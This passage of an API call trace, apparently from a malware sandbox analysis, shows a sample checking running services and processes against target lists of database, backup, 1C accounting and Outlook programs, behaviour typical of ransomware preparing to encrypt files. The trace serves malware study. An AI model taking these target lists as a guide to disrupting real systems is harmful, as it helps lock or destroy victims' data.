(lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0261.703] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0261.703] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0261.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0261.703] lstrlenW (lpString="Dhcp") returned 4 [0261.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0261.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0261.703] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0261.703] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0261.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0261.703] lstrlenW (lpString="Dnscache") returned 8 [0261.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0261.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0261.703] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0261.703] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0261.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0261.703] lstrlenW (lpString="DPS") returned 3 [0261.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0261.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0261.703] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0261.703] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0261.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0261.703] lstrlenW (lpString="eventlog") returned 8 [0261.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0261.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0261.703] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0261.703] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0261.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0261.703] lstrlenW (lpString="EventSystem") returned 11 [0261.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0261.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0261.703] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0261.703] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0261.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0261.704] lstrlenW (lpString="gpsvc") returned 5 [0261.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0261.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0261.704] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0261.704] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0261.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0261.704] lstrlenW (lpString="LanmanWorkstation") returned 17 [0261.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0261.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0261.704] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0261.704] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0261.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0261.704] lstrlenW (lpString="lmhosts") returned 7 [0261.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0261.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0261.704] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0261.704] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0261.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0261.704] lstrlenW (lpString="MMCSS") returned 5 [0261.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0261.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0261.704] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0261.704] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0261.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0261.704] lstrlenW (lpString="MpsSvc") returned 6 [0261.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0261.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0261.704] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0261.704] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0261.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0261.704] lstrlenW (lpString="NlaSvc") returned 6 [0261.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0261.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0261.705] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0261.705] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0261.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0261.705] lstrlenW (lpString="nsi") returned 3 [0261.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0261.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0261.705] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0261.705] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0261.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0261.705] lstrlenW (lpString="PcaSvc") returned 6 [0261.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0261.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0261.705] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0261.705] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0261.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0261.705] lstrlenW (lpString="PlugPlay") returned 8 [0261.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0261.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0261.705] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0261.705] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0261.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0261.705] lstrlenW (lpString="Power") returned 5 [0261.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0261.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0261.705] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0261.705] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0261.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0261.705] lstrlenW (lpString="ProfSvc") returned 7 [0261.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0261.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0261.705] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0261.705] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0261.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0261.706] lstrlenW (lpString="RpcEptMapper") returned 12 [0261.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0261.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0261.706] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0261.706] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0261.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0261.706] lstrlenW (lpString="RpcSs") returned 5 [0261.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0261.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0261.706] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0261.706] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0261.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0261.706] lstrlenW (lpString="SamSs") returned 5 [0261.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0261.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0261.706] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0261.706] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0261.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0261.706] lstrlenW (lpString="Schedule") returned 8 [0261.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0261.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0261.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0261.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0261.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0261.707] lstrlenW (lpString="SENS") returned 4 [0261.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0261.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0261.707] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0261.707] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0261.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0261.707] lstrlenW (lpString="ShellHWDetection") returned 16 [0261.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0261.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0261.707] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0261.707] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0261.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0261.707] lstrlenW (lpString="Spooler") returned 7 [0261.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0261.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0261.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0261.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0261.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0261.707] lstrlenW (lpString="SysMain") returned 7 [0261.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0261.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0261.707] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0261.707] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0261.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0261.707] lstrlenW (lpString="Themes") returned 6 [0261.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0261.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0261.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0261.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0261.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0261.708] lstrlenW (lpString="TrkWks") returned 6 [0261.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0261.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0261.708] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0261.708] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0261.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0261.708] lstrlenW (lpString="UxSms") returned 5 [0261.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0261.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0261.708] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0261.708] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0261.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0261.708] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0261.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e0 [0261.709] Process32FirstW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.709] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.709] lstrlenW (lpString="System") returned 6 [0261.709] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0261.710] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0261.710] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0261.710] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0261.710] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0261.710] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0261.710] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0261.710] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.710] lstrlenW (lpString="smss.exe") returned 8 [0261.710] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0261.710] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0261.710] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0261.710] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0261.710] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0261.710] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0261.710] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0261.710] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.710] lstrlenW (lpString="csrss.exe") returned 9 [0261.710] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0261.710] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0261.711] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0261.711] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0261.711] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0261.711] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0261.711] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0261.711] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.711] lstrlenW (lpString="wininit.exe") returned 11 [0261.711] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0261.711] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0261.711] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0261.711] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0261.711] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0261.711] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0261.711] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0261.711] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.711] lstrlenW (lpString="csrss.exe") returned 9 [0261.711] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0261.711] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0261.711] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0261.711] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0261.712] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0261.712] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0261.712] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0261.712] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.712] lstrlenW (lpString="winlogon.exe") returned 12 [0261.712] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0261.712] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0261.712] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0261.712] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0261.712] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0261.712] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0261.712] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0261.712] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.712] lstrlenW (lpString="services.exe") returned 12 [0261.712] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0261.712] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0261.712] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0261.712] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0261.712] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0261.712] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0261.713] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0261.713] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.713] lstrlenW (lpString="lsass.exe") returned 9 [0261.713] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0261.713] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0261.713] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0261.713] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0261.713] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0261.713] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0261.713] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0261.713] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0261.713] lstrlenW (lpString="lsm.exe") returned 7 [0261.713] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0261.713] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0261.713] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0261.713] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0261.713] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0261.713] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0261.713] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0261.714] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.714] lstrlenW (lpString="svchost.exe") returned 11 [0261.714] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0261.714] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.714] lstrlenW (lpString="svchost.exe") returned 11 [0261.714] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0261.714] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0261.714] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.715] lstrlenW (lpString="svchost.exe") returned 11 [0261.715] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0261.715] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0261.715] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0261.715] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0261.715] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0261.715] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0261.715] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0261.715] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.715] lstrlenW (lpString="svchost.exe") returned 11 [0261.715] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.716] lstrlenW (lpString="svchost.exe") returned 11 [0261.716] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.716] lstrlenW (lpString="audiodg.exe") returned 11 [0261.716] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.716] lstrlenW (lpString="svchost.exe") returned 11 [0261.716] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.716] lstrlenW (lpString="svchost.exe") returned 11 [0261.716] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, 